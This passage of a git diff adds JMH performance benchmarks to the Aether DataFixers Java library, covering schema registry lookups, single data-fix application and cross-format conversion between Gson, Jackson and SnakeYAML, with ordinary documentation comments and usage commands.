Measures the time to retrieve a schema using floor semantics, where + * the registry returns the schema with the highest version ≤ the requested version. This pattern is used when + * data may be at intermediate versions not explicitly registered.

+ * + *

The lookup versions include both exact matches (10, 20, 30, ...) and + * in-between values (5, 15, 25, ...) to exercise both fast-path exact matches and slower floor searches.

+ * + * @param s the shared benchmark state containing the registry and lookup versions + * @param t the per-thread state providing random lookup indices + * @param blackhole JMH blackhole to prevent dead code elimination + */ + @Benchmark + public void floorLookup(final BenchmarkState s, + final ThreadState t, + final Blackhole blackhole) { + final int index = t.nextFloorIndex(); + final Schema schema = s.registry.get(s.lookupVersions[index]); + blackhole.consume(schema); + } + + /** + * Benchmarks latest schema retrieval performance. + * + *

Measures the time to retrieve the most recent schema from the registry. + * This operation should be O(1) as the latest schema is typically cached or stored in a dedicated field.

+ * + *

This benchmark serves as a baseline for the fastest possible lookup + * operation and helps identify any unexpected overhead in the registry implementation.

+ * + * @param s the shared benchmark state containing the registry + * @param blackhole JMH blackhole to prevent dead code elimination + */ + @Benchmark + public void latestLookup(final BenchmarkState s, + final Blackhole blackhole) { + final Schema schema = s.registry.latest(); + blackhole.consume(schema); + } + + /** + * Benchmarks sequential lookup of all registered schemas. + * + *

Measures the aggregate time to look up every schema in the registry + * in version order. This pattern occurs during schema validation, debugging, or when building migration path + * analyses.

+ * + *

Note: This benchmark performs multiple lookups per invocation + * ({@code schemaCount} lookups). The reported time is for the entire sequence, not per-lookup. Divide by + * {@code schemaCount} to get per-lookup overhead.

+ * + * @param s the shared benchmark state containing the registry and versions + * @param blackhole JMH blackhole to prevent dead code elimination + */ + @Benchmark + public void sequentialLookup(final BenchmarkState s, + final Blackhole blackhole) { + for (final DataVersion version : s.versions) { + final Schema schema = s.registry.get(version); + blackhole.consume(schema); + } + } + + /** + * Shared JMH state containing the schema registry and version arrays. + * + *

This state is shared across all threads within a benchmark trial + * ({@link Scope#Benchmark}). The registry is populated with mock schemas at versions 10, 20, 30, ... up to + * {@code schemaCount * 10}.

+ * + *

The registry is frozen after setup to match production usage patterns + * where registries are immutable during normal operation.

+ */ + @State(Scope.Benchmark) + public static class BenchmarkState { + + /** + * The number of schemas to register, injected by JMH. + * + *

Controls the size of the schema registry to measure lookup + * performance scaling:

+ *
    + *
  • 10: Small registry, fits entirely in L1 cache
  • + *
  • 50: Medium registry, typical for most applications
  • + *
  • 100: Large registry, may exceed L1 cache
  • + *
  • 500: Stress test for registry scalability
  • + *
+ */ + @Param({"10", "50", "100", "500"}) + public int schemaCount; + + /** + * The frozen schema registry containing all registered schemas. + */ + public SchemaRegistry registry; + + /** + * Array of exact registered versions (10, 20, 30, ...). + * + *

Used by {@link #exactLookup} to ensure lookups always hit + * registered versions.

+ */ + public DataVersion[] versions; + + /** + * Array of lookup versions including in-between values (5, 10, 15, 20, ...). + * + *

Used by {@link #floorLookup} to exercise both exact matches + * and floor search behavior.

+ */ + public DataVersion[] lookupVersions; + + /** + * Initializes the schema registry and version arrays once per trial. + * + *

Creates a {@link SimpleSchemaRegistry} populated with minimal mock + * schemas at regular version intervals. The registry is frozen after population to enable any internal + * optimizations.

+ */ + @Setup(Level.Trial) + public void setup() { + final SimpleSchemaRegistry simpleRegistry = new SimpleSchemaRegistry(); + this.versions = new DataVersion[this.schemaCount]; + + for (int i = 0; i < this.schemaCount; i++) { + final int version = (i + 1) * 10; + final DataVersion dataVersion = new DataVersion(version); + this.versions[i] = dataVersion; + simpleRegistry.register(MockSchemas.minimal(version)); + } + + simpleRegistry.freeze(); + this.registry = simpleRegistry; + + this.lookupVersions = new DataVersion[this.schemaCount * 2]; + for (int i = 0; i < this.lookupVersions.length; i++) { + this.lookupVersions[i] = new DataVersion((i + 1) * 5); + } + } + } + + /** + * Per-thread JMH state providing pre-generated random lookup indices. + * + *

Random number generation is expensive and would dominate the benchmark + * if performed in the hot path. This state pre-generates buffers of random indices during setup, allowing the + * benchmark methods to retrieve indices via simple array access and bit masking.

+ * + *

Each thread has its own state instance ({@link Scope#Thread}) to avoid + * contention on shared RNG state. The fixed seed ensures reproducible results across benchmark runs.

+ * + * @see BenchmarkState + */ + @State(Scope.Thread) + public static class ThreadState { + + /** + * Size of the pre-generated index buffer. + * + *

Power-of-two size enables cheap index wrapping via bit masking + * instead of modulo operation.

+ */ + private static final int INDEX_BUFFER_SIZE = 1024; + + /** + * Bit mask for wrapping cursor to buffer bounds ({@code INDEX_BUFFER_SIZE - 1}). + */ + private static final int INDEX_MASK = INDEX_BUFFER_SIZE - 1; + + /** + * Pre-generated indices into {@link BenchmarkState#versions}. + */ + private final int[] exactIndices = new int[INDEX_BUFFER_SIZE]; + + /** + * Pre-generated indices into {@link BenchmarkState#lookupVersions}. + */ + private final int[] floorIndices = new int[INDEX_BUFFER_SIZE]; + + /** + * Current position in {@link #exactIndices}. + */ + private int exactCursor; + + /** + * Current position in {@link #floorIndices}. + */ + private int floorCursor; + + /** + * Thread-local random number generator for index generation. + */ + private SplittableRandom random; + + /** + * Initializes the random number generator once per trial. + * + *

Uses a fixed seed (42) for reproducibility. Each thread gets its + * own {@link SplittableRandom} instance to avoid synchronization overhead.

+ */ + @Setup(Level.Trial) + public void setupTrial() { + this.random = new SplittableRandom(42L); + } + + /** + * Refills the index buffers at each iteration. + * + *

Generates fresh random indices based on the current + * {@link BenchmarkState#schemaCount} parameter. Resets cursors to the beginning of each buffer.

+ * + * @param s the shared benchmark state providing array bounds + */ + @Setup(Level.Iteration) + public void setupIteration(final BenchmarkState s) { + for (int i = 0; i < INDEX_BUFFER_SIZE; i++) { + this.exactIndices[i] = this.random.nextInt(s.versions.length); + this.floorIndices[i] = this.random.nextInt(s.lookupVersions.length); + } + this.exactCursor = 0; + this.floorCursor = 0; + } + + /** + * Returns the next random index for exact version lookup. + * + *

Uses bit masking to wrap around the buffer efficiently.

+ * + * @return a random index into {@link BenchmarkState#versions} + */ + public int nextExactIndex() { + return this.exactIndices[this.exactCursor++ & INDEX_MASK]; + } + + /** + * Returns the next random index for floor version lookup. + * + *

Uses bit masking to wrap around the buffer efficiently.

+ * + * @return a random index into {@link BenchmarkState#lookupVersions} + */ + public int nextFloorIndex() { + return this.floorIndices[this.floorCursor++ & INDEX_MASK]; + } + } +} diff --git a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/core/SingleFixBenchmark.java b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/core/SingleFixBenchmark.java new file mode 100644 index 0000000..c74d288 --- /dev/null +++ b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/core/SingleFixBenchmark.java @@ -0,0 +1,315 @@ +/* + * Copyright (c) 2026 Splatgames.de Software and Contributors + * + * Permission is hereby granted, free of charge, to any person obtaining a copy + * of this software and associated documentation files (the "Software"), to deal + * in the Software without restriction, including without limitation the rights + * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell + * copies of the Software, and to permit persons to whom the Software is + * furnished to do so, subject to the following conditions: + * + * The above copyright notice and this permission notice shall be included in all + * copies or substantial portions of the Software. + * + * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR + * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, + * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE + * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER + * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, + * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE + * SOFTWARE. + */ + +package de.splatgames.aether.datafixers.benchmarks.core; + +import com.google.gson.JsonElement; +import de.splatgames.aether.datafixers.api.DataVersion; +import de.splatgames.aether.datafixers.api.dynamic.Dynamic; +import de.splatgames.aether.datafixers.api.fix.DataFixer; +import de.splatgames.aether.datafixers.benchmarks.util.BenchmarkBootstrap; +import de.splatgames.aether.datafixers.benchmarks.util.BenchmarkDataGenerator; +import de.splatgames.aether.datafixers.benchmarks.util.PayloadSize; +import de.splatgames.aether.datafixers.codec.json.gson.GsonOps; +import org.openjdk.jmh.annotations.Benchmark; +import org.openjdk.jmh.annotations.BenchmarkMode; +import org.openjdk.jmh.annotations.Fork; +import org.openjdk.jmh.annotations.Level; +import org.openjdk.jmh.annotations.Measurement; +import org.openjdk.jmh.annotations.Mode; +import org.openjdk.jmh.annotations.OutputTimeUnit; +import org.openjdk.jmh.annotations.Param; +import org.openjdk.jmh.annotations.Scope; +import org.openjdk.jmh.annotations.Setup; +import org.openjdk.jmh.annotations.State; +import org.openjdk.jmh.annotations.Warmup; +import org.openjdk.jmh.infra.Blackhole; + +import java.util.concurrent.TimeUnit; + +/** + * JMH benchmark for single DataFix application performance. + * + *

Measures the overhead of applying a single fix to data of varying sizes. + * Includes a baseline identity fix measurement to isolate framework overhead from actual transformation costs.

+ * + *

Benchmark Methods

+ *
    + *
  • {@link #identityFix} - Baseline measurement with no-op transformation
  • + *
  • {@link #singleRenameFix} - Single field rename operation
  • + *
  • {@link #playerDataFix} - Complex object transformation with codec roundtrip
  • + *
  • {@link #playerDataFixEndToEnd} - Full pipeline including setup overhead
  • + *
+ * + *

Benchmark Configuration

+ * + * + * + * + * + * + * + *
SettingValue
Warmup5 iterations, 1 second each
Measurement10 iterations, 1 second each
Forks2 (for statistical significance)
JVM Heap2 GB min/max
Time UnitMicroseconds
+ * + *

Interpreting Results

+ *
    + *
  • Throughput (ops/us): Higher is better. Operations per microsecond.
  • + *
  • Average Time (us/op): Lower is better. Microseconds per operation.
  • + *
  • Error (±): 99.9% confidence interval. Smaller means more stable results.
  • + *
+ * + *

Usage

+ *
{@code
+ * # Run only this benchmark
+ * java -jar benchmarks.jar SingleFixBenchmark
+ *
+ * # Quick test with reduced iterations
+ * java -jar benchmarks.jar SingleFixBenchmark -wi 1 -i 1 -f 1
+ *
+ * # Specific payload size only
+ * java -jar benchmarks.jar SingleFixBenchmark -p payloadSize=SMALL
+ * }
+ * + * @author Erik Pförtner + * @see BenchmarkBootstrap + * @see BenchmarkDataGenerator + * @see PayloadSize + * @since 1.0.0 + */ +@BenchmarkMode({Mode.Throughput, Mode.AverageTime}) +@OutputTimeUnit(TimeUnit.MICROSECONDS) +@State(Scope.Benchmark) +@Warmup(iterations = 5, time = 1, timeUnit = TimeUnit.SECONDS) +@Measurement(iterations = 10, time = 1, timeUnit = TimeUnit.SECONDS) +@Fork(value = 2, jvmArgs = {"-Xms2G", "-Xmx2G"}) +public class SingleFixBenchmark { + + /** + * Benchmarks a single field rename operation. + * + *

Measures the performance of renaming one field in the input data. + * This represents a common, lightweight migration operation. The benchmark is parameterized by {@link PayloadSize} + * to measure scaling behavior.

+ * + * @param s the shared benchmark state containing fixer and input data + * @param blackhole JMH blackhole to prevent dead code elimination + */ + @Benchmark + public void singleRenameFix(final SizedState s, + final Blackhole blackhole) { + blackhole.consume(s.fixer.update( + BenchmarkBootstrap.BENCHMARK_TYPE, + s.input, + s.fromVersion, + s.toVersion)); + } + + /** + * Benchmarks the identity (no-op) fix as a baseline measurement. + * + *

Measures pure framework overhead without any actual data transformation. + * Use this as a baseline to calculate the true cost of transformations by subtracting identity time from other + * benchmark results.

+ * + * @param s the shared benchmark state containing identity fixer and input data + * @param blackhole JMH blackhole to prevent dead code elimination + */ + @Benchmark + public void identityFix(final SizedState s, + final Blackhole blackhole) { + blackhole.consume(s.identityFixer.update( + BenchmarkBootstrap.BENCHMARK_TYPE, + s.input, + s.fromVersion, + s.toVersion)); + } + + /** + * Benchmarks a complex player data transformation with codec roundtrip. + * + *

Measures the performance of a realistic migration scenario where data + * is decoded via codec, transformed, and re-encoded. This represents the upper bound of migration cost for complex + * object transformations.

+ * + *

This benchmark is expected to be significantly slower than {@link #singleRenameFix} + * because codec roundtrips involve reflection, object instantiation, and full serialization/deserialization + * cycles.

+ * + * @param s the shared player benchmark state + * @param blackhole JMH blackhole to prevent dead code elimination + */ + @Benchmark + public void playerDataFix(final PlayerState s, + final Blackhole blackhole) { + blackhole.consume(s.playerFixer.update( + BenchmarkBootstrap.PLAYER_TYPE, + s.playerInput, + s.fromVersion, + s.toVersion)); + } + + /** + * Benchmarks the complete end-to-end pipeline including setup overhead. + * + *

Measures the total cost of a migration including:

+ *
    + *
  • Test data generation
  • + *
  • DataFixer bootstrap and initialization
  • + *
  • Actual migration execution
  • + *
+ * + *

This benchmark is useful for understanding cold-start performance + * and the cost of creating new DataFixer instances. In production code, + * DataFixers should be reused rather than recreated per-operation.

+ * + *

Note: Results will be significantly slower than {@link #playerDataFix} + * due to setup overhead included in each iteration.

+ * + * @param blackhole JMH blackhole to prevent dead code elimination + */ + @Benchmark + public void playerDataFixEndToEnd(final Blackhole blackhole) { + final Dynamic playerInput = BenchmarkDataGenerator.generatePlayerData(GsonOps.INSTANCE); + final DataFixer playerFixer = BenchmarkBootstrap.createPlayerFixer(); + blackhole.consume(playerFixer.update( + BenchmarkBootstrap.PLAYER_TYPE, + playerInput, + new DataVersion(1), + new DataVersion(2))); + } + + /** + * Shared JMH state for benchmarks parameterized by payload size. + * + *

This state is shared across all threads within a benchmark trial + * ({@link Scope#Benchmark}). The {@link #payloadSize} parameter controls the complexity of test data:

+ * + *
    + *
  • SMALL: 5 fields, 2 nesting levels, 10 array elements
  • + *
  • MEDIUM: 20 fields, 4 nesting levels, 100 array elements
  • + *
  • LARGE: 50 fields, 6 nesting levels, 1000 array elements
  • + *
+ * + * @see PayloadSize + */ + @State(Scope.Benchmark) + public static class SizedState { + + /** + * The payload size parameter, injected by JMH. Controls the complexity of generated test data. + */ + @Param({"SMALL", "MEDIUM", "LARGE"}) + public PayloadSize payloadSize; + + /** + * DataFixer configured with a single field rename fix (v1 → v2). + */ + public DataFixer fixer; + + /** + * DataFixer configured with an identity (no-op) fix for baseline measurement. + */ + public DataFixer identityFixer; + + /** + * Pre-generated input data matching {@link #payloadSize}. + */ + public Dynamic input; + + /** + * Source version for migrations (v1). + */ + public DataVersion fromVersion; + + /** + * Target version for migrations (v2). + */ + public DataVersion toVersion; + + /** + * Initializes the benchmark state once per trial. + * + *

Creates fixers and generates test data based on the current + * {@link #payloadSize} parameter value.

+ */ + @Setup(Level.Trial) + public void setup() { + this.fixer = BenchmarkBootstrap.createSingleFixFixer(); + this.identityFixer = BenchmarkBootstrap.createIdentityFixer(); + this.input = BenchmarkDataGenerator.generate(GsonOps.INSTANCE, this.payloadSize); + this.fromVersion = new DataVersion(1); + this.toVersion = new DataVersion(2); + } + } + + /** + * Shared JMH state for player-specific benchmarks. + * + *

This state is separate from {@link SizedState} because the player benchmark + * uses a fixed, realistic data structure rather than parameterized payload sizes. The player data simulates a + * typical game entity with nested objects, arrays, and various field types.

+ * + *

The player fix performs a complete codec roundtrip transformation, + * making it representative of real-world migration scenarios where data is decoded, transformed, and + * re-encoded.

+ * + * @see BenchmarkBootstrap#createPlayerFixer() + * @see BenchmarkDataGenerator#generatePlayerData + */ + @State(Scope.Benchmark) + public static class PlayerState { + + /** + * DataFixer configured with a player-specific transformation fix. Performs codec decode → transform → encode + * cycle. + */ + public DataFixer playerFixer; + + /** + * Pre-generated player data structure with realistic game entity fields. + */ + public Dynamic playerInput; + + /** + * Source version for migrations (v1). + */ + public DataVersion fromVersion; + + /** + * Target version for migrations (v2). + */ + public DataVersion toVersion; + + /** + * Initializes the player benchmark state once per trial. + * + *

Creates the player fixer and generates realistic player test data.

+ */ + @Setup(Level.Trial) + public void setup() { + this.playerFixer = BenchmarkBootstrap.createPlayerFixer(); + this.playerInput = BenchmarkDataGenerator.generatePlayerData(GsonOps.INSTANCE); + this.fromVersion = new DataVersion(1); + this.toVersion = new DataVersion(2); + } + } +} diff --git a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/core/package-info.java b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/core/package-info.java new file mode 100644 index 0000000..32b058f --- /dev/null +++ b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/core/package-info.java @@ -0,0 +1,90 @@ +/* + * Copyright (c) 2026 Splatgames.de Software and Contributors + * + * Permission is hereby granted, free of charge, to any person obtaining a copy + * of this software and associated documentation files (the "Software"), to deal + * in the Software without restriction, including without limitation the rights + * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell + * copies of the Software, and to permit persons to whom the Software is + * furnished to do so, subject to the following conditions: + * + * The above copyright notice and this permission notice shall be included in all + * copies or substantial portions of the Software. + * + * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR + * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, + * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE + * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER + * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, + * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE + * SOFTWARE. + */ + +/** + * Core JMH benchmarks for the Aether DataFixers framework. + * + *

This package contains benchmarks that measure the fundamental performance characteristics + * of the data fixer system, including fix application, chain execution, and schema registry + * operations. These benchmarks form the foundation for performance regression testing and + * optimization efforts.

+ * + *

Benchmark Classes

+ * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + *
ClassFocus AreaKey Metrics
{@link de.splatgames.aether.datafixers.benchmarks.core.SingleFixBenchmark}Single fix applicationPer-fix overhead, payload size scaling
{@link de.splatgames.aether.datafixers.benchmarks.core.MultiFixChainBenchmark}Chained fix executionChain length scaling, partial migration cost
{@link de.splatgames.aether.datafixers.benchmarks.core.SchemaLookupBenchmark}Schema registry operationsLookup latency, registry size scaling
+ * + *

Running Benchmarks

+ *
{@code
+ * # Run all core benchmarks
+ * java -jar benchmarks.jar ".*core.*"
+ *
+ * # Run with specific JVM options
+ * java -jar benchmarks.jar ".*core.*" -jvmArgs "-XX:+UseG1GC"
+ *
+ * # Generate JSON report
+ * java -jar benchmarks.jar ".*core.*" -rf json -rff core_results.json
+ * }
+ * + *

Benchmark Design Principles

+ *
    + *
  • Isolation: Each benchmark measures a single operation to isolate performance characteristics.
  • + *
  • Parameterization: Benchmarks are parameterized to capture scaling behavior across different input sizes.
  • + *
  • Reproducibility: Fixed seeds and deterministic data generation ensure reproducible results.
  • + *
  • JMH Best Practices: All benchmarks follow JMH guidelines including proper use of {@code Blackhole}, + * state scoping, and setup level annotations.
  • + *
+ * + *

Interpreting Results

+ *

All benchmarks in this package report both throughput (ops/time) and average time (time/op). + * When comparing results:

+ *
    + *
  • Compare measurements from the same JVM version and hardware
  • + *
  • Consider the 99.9% confidence interval (error bounds)
  • + *
  • Run multiple forks to account for JIT compilation variance
  • + *
  • Use baseline benchmarks (e.g., identity fix) to isolate framework overhead
  • + *
+ * + * @see de.splatgames.aether.datafixers.benchmarks.util.BenchmarkBootstrap + * @see de.splatgames.aether.datafixers.benchmarks.util.BenchmarkDataGenerator + * @since 1.0.0 + */ +package de.splatgames.aether.datafixers.benchmarks.core; diff --git a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/format/CrossFormatBenchmark.java b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/format/CrossFormatBenchmark.java new file mode 100644 index 0000000..ac0bce9 --- /dev/null +++ b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/format/CrossFormatBenchmark.java @@ -0,0 +1,361 @@ +/* + * Copyright (c) 2026 Splatgames.de Software and Contributors + * + * Permission is hereby granted, free of charge, to any person obtaining a copy + * of this software and associated documentation files (the "Software"), to deal + * in the Software without restriction, including without limitation the rights + * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell + * copies of the Software, and to permit persons to whom the Software is + * furnished to do so, subject to the following conditions: + * + * The above copyright notice and this permission notice shall be included in all + * copies or substantial portions of the Software. + * + * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR + * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, + * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE + * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER + * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, + * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE + * SOFTWARE. + */ + +package de.splatgames.aether.datafixers.benchmarks.format; + +import com.fasterxml.jackson.databind.JsonNode; +import com.google.gson.JsonElement; +import de.splatgames.aether.datafixers.benchmarks.util.BenchmarkDataGenerator; +import de.splatgames.aether.datafixers.benchmarks.util.PayloadSize; +import de.splatgames.aether.datafixers.codec.json.gson.GsonOps; +import de.splatgames.aether.datafixers.codec.json.jackson.JacksonJsonOps; +import de.splatgames.aether.datafixers.codec.yaml.jackson.JacksonYamlOps; +import de.splatgames.aether.datafixers.codec.yaml.snakeyaml.SnakeYamlOps; +import org.openjdk.jmh.annotations.Benchmark; +import org.openjdk.jmh.annotations.BenchmarkMode; +import org.openjdk.jmh.annotations.Fork; +import org.openjdk.jmh.annotations.Level; +import org.openjdk.jmh.annotations.Measurement; +import org.openjdk.jmh.annotations.Mode; +import org.openjdk.jmh.annotations.OutputTimeUnit; +import org.openjdk.jmh.annotations.Param; +import org.openjdk.jmh.annotations.Scope; +import org.openjdk.jmh.annotations.Setup; +import org.openjdk.jmh.annotations.State; +import org.openjdk.jmh.annotations.Warmup; +import org.openjdk.jmh.infra.Blackhole; + +import java.util.concurrent.TimeUnit; + +/** + * JMH benchmark for cross-format conversion performance between DynamicOps implementations. + * + *

This benchmark measures the overhead of converting data between different + * serialization formats using the {@code DynamicOps.convertTo()} mechanism. Cross-format + * conversion is essential when integrating systems that use different data formats + * or when migrating data through format-agnostic DataFixers.

+ * + *

Conversion Pairs Benchmarked

+ * + *

JSON Library Conversions

+ *
    + *
  • {@link #gsonToJackson} - Gson JsonElement → Jackson JsonNode
  • + *
  • {@link #jacksonToGson} - Jackson JsonNode → Gson JsonElement
  • + *
+ * + *

JSON to YAML Conversions

+ *
    + *
  • {@link #gsonToSnakeYaml} - Gson JsonElement → SnakeYAML Object
  • + *
  • {@link #snakeYamlToGson} - SnakeYAML Object → Gson JsonElement
  • + *
+ * + *

Jackson Ecosystem Conversions

+ *
    + *
  • {@link #jacksonJsonToYaml} - Jackson JSON → Jackson YAML
  • + *
  • {@link #jacksonYamlToJson} - Jackson YAML → Jackson JSON
  • + *
+ * + *

YAML Library Conversions

+ *
    + *
  • {@link #snakeYamlToJacksonYaml} - SnakeYAML → Jackson YAML
  • + *
  • {@link #jacksonYamlToSnakeYaml} - Jackson YAML → SnakeYAML
  • + *
+ * + *

Conversion Matrix

+ * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + *
From \ ToGsonJackson JSONSnakeYAMLJackson YAML
Gson--
Jackson JSON--
SnakeYAML--
Jackson YAML--
+ * + *

Parameters

+ * + * + * + *
ParameterValuesDescription
payloadSizeSMALL, MEDIUMTest data complexity
+ * + *

Benchmark Configuration

+ * + * + * + * + * + * + * + *
SettingValue
Warmup5 iterations, 1 second each
Measurement10 iterations, 1 second each
Forks2
JVM Heap2 GB min/max
Time UnitMicroseconds
+ * + *

Interpreting Results

+ *
    + *
  • Same-ecosystem conversions (e.g., Jackson JSON ↔ Jackson YAML) are + * typically faster due to shared internal representations
  • + *
  • Cross-ecosystem conversions (e.g., Gson ↔ SnakeYAML) require full + * tree traversal and node creation
  • + *
  • Asymmetric performance: A→B may differ from B→A due to different + * source iteration and target construction costs
  • + *
+ * + *

Usage

+ *
{@code
+ * # Run all cross-format benchmarks
+ * java -jar benchmarks.jar CrossFormatBenchmark
+ *
+ * # Run JSON library conversions only
+ * java -jar benchmarks.jar "CrossFormatBenchmark.*(gson|jackson)To(Gson|Jackson).*"
+ *
+ * # Run YAML conversions only
+ * java -jar benchmarks.jar "CrossFormatBenchmark.*Yaml.*"
+ *
+ * # Compare with specific payload size
+ * java -jar benchmarks.jar CrossFormatBenchmark -p payloadSize=MEDIUM
+ * }
+ * + * @author Erik Pförtner + * @see JsonBenchmark + * @see YamlBenchmark + * @see TomlXmlBenchmark + * @see de.splatgames.aether.datafixers.api.dynamic.DynamicOps#convertTo(DynamicOps, Object) + * @since 1.0.0 + */ +@BenchmarkMode({Mode.Throughput, Mode.AverageTime}) +@OutputTimeUnit(TimeUnit.MICROSECONDS) +@State(Scope.Benchmark) +@Warmup(iterations = 5, time = 1, timeUnit = TimeUnit.SECONDS) +@Measurement(iterations = 10, time = 1, timeUnit = TimeUnit.SECONDS) +@Fork(value = 2, jvmArgs = {"-Xms2G", "-Xmx2G"}) +public class CrossFormatBenchmark { + + /** + * Payload size parameter controlling test data complexity. + * + *

Limited to SMALL and MEDIUM as cross-format conversion overhead + * can be significant with large data sets.

+ */ + @Param({"SMALL", "MEDIUM"}) + private PayloadSize payloadSize; + + /** + * Google Gson DynamicOps implementation. + */ + private GsonOps gsonOps; + + /** + * Jackson JSON DynamicOps implementation. + */ + private JacksonJsonOps jacksonJsonOps; + + /** + * SnakeYAML DynamicOps implementation using native Java types. + */ + private SnakeYamlOps snakeYamlOps; + + /** + * Jackson YAML DynamicOps implementation. + */ + private JacksonYamlOps jacksonYamlOps; + + /** + * Pre-generated Gson root element for conversion benchmarks. + */ + private JsonElement gsonRoot; + + /** + * Pre-generated Jackson JSON root node for conversion benchmarks. + */ + private JsonNode jacksonJsonRoot; + + /** + * Pre-generated SnakeYAML root object for conversion benchmarks. + */ + private Object snakeYamlRoot; + + /** + * Pre-generated Jackson YAML root node for conversion benchmarks. + */ + private JsonNode jacksonYamlRoot; + + /** + * Initializes all DynamicOps instances and pre-generates test data in each format. + * + *

Data is pre-generated in each format to ensure conversion benchmarks measure + * only the conversion overhead, not data generation time.

+ */ + @Setup(Level.Trial) + public void setup() { + this.gsonOps = GsonOps.INSTANCE; + this.jacksonJsonOps = JacksonJsonOps.INSTANCE; + this.snakeYamlOps = SnakeYamlOps.INSTANCE; + this.jacksonYamlOps = JacksonYamlOps.INSTANCE; + + this.gsonRoot = BenchmarkDataGenerator.generate(this.gsonOps, this.payloadSize).value(); + this.jacksonJsonRoot = BenchmarkDataGenerator.generate(this.jacksonJsonOps, this.payloadSize).value(); + this.snakeYamlRoot = BenchmarkDataGenerator.generate(this.snakeYamlOps, this.payloadSize).value(); + this.jacksonYamlRoot = BenchmarkDataGenerator.generate(this.jacksonYamlOps, this.payloadSize).value(); + } + + // ==================== Gson <-> Jackson JSON Conversions ==================== + + /** + * Benchmarks conversion from Gson JsonElement to Jackson JsonNode. + * + *

Measures the overhead of converting between two JSON libraries. + * Both represent JSON but use different internal tree structures.

+ * + * @param blackhole JMH blackhole to prevent dead code elimination + */ + @Benchmark + public void gsonToJackson(final Blackhole blackhole) { + final JsonNode result = this.jacksonJsonOps.convertTo(this.gsonOps, this.gsonRoot); + blackhole.consume(result); + } + + /** + * Benchmarks conversion from Jackson JsonNode to Gson JsonElement. + * + *

Measures the reverse conversion from Jackson to Gson representation.

+ * + * @param blackhole JMH blackhole to prevent dead code elimination + */ + @Benchmark + public void jacksonToGson(final Blackhole blackhole) { + final JsonElement result = this.gsonOps.convertTo(this.jacksonJsonOps, this.jacksonJsonRoot); + blackhole.consume(result); + } + + // ==================== Gson <-> SnakeYAML Conversions ==================== + + /** + * Benchmarks conversion from Gson JsonElement to SnakeYAML native types. + * + *

Measures cross-ecosystem conversion from JSON library to YAML library. + * SnakeYAML uses native Java Maps and Lists internally.

+ * + * @param blackhole JMH blackhole to prevent dead code elimination + */ + @Benchmark + public void gsonToSnakeYaml(final Blackhole blackhole) { + final Object result = this.snakeYamlOps.convertTo(this.gsonOps, this.gsonRoot); + blackhole.consume(result); + } + + /** + * Benchmarks conversion from SnakeYAML native types to Gson JsonElement. + * + *

Measures cross-ecosystem conversion from YAML native types to JSON tree.

+ * + * @param blackhole JMH blackhole to prevent dead code elimination + */ + @Benchmark + public void snakeYamlToGson(final Blackhole blackhole) { + final JsonElement result = this.gsonOps.convertTo(this.snakeYamlOps, this.snakeYamlRoot); + blackhole.consume(result); + } + + // ==================== Jackson JSON <-> Jackson YAML Conversions ==================== + + /** + * Benchmarks conversion from Jackson JSON to Jackson YAML. + * + *

Measures conversion within the Jackson ecosystem. Both formats use + * JsonNode internally, potentially enabling optimizations.

+ * + * @param blackhole JMH blackhole to prevent dead code elimination + */ + @Benchmark + public void jacksonJsonToYaml(final Blackhole blackhole) { + final JsonNode result = this.jacksonYamlOps.convertTo(this.jacksonJsonOps, this.jacksonJsonRoot); + blackhole.consume(result); + } + + /** + * Benchmarks conversion from Jackson YAML to Jackson JSON. + * + *

Measures reverse conversion within the Jackson ecosystem.

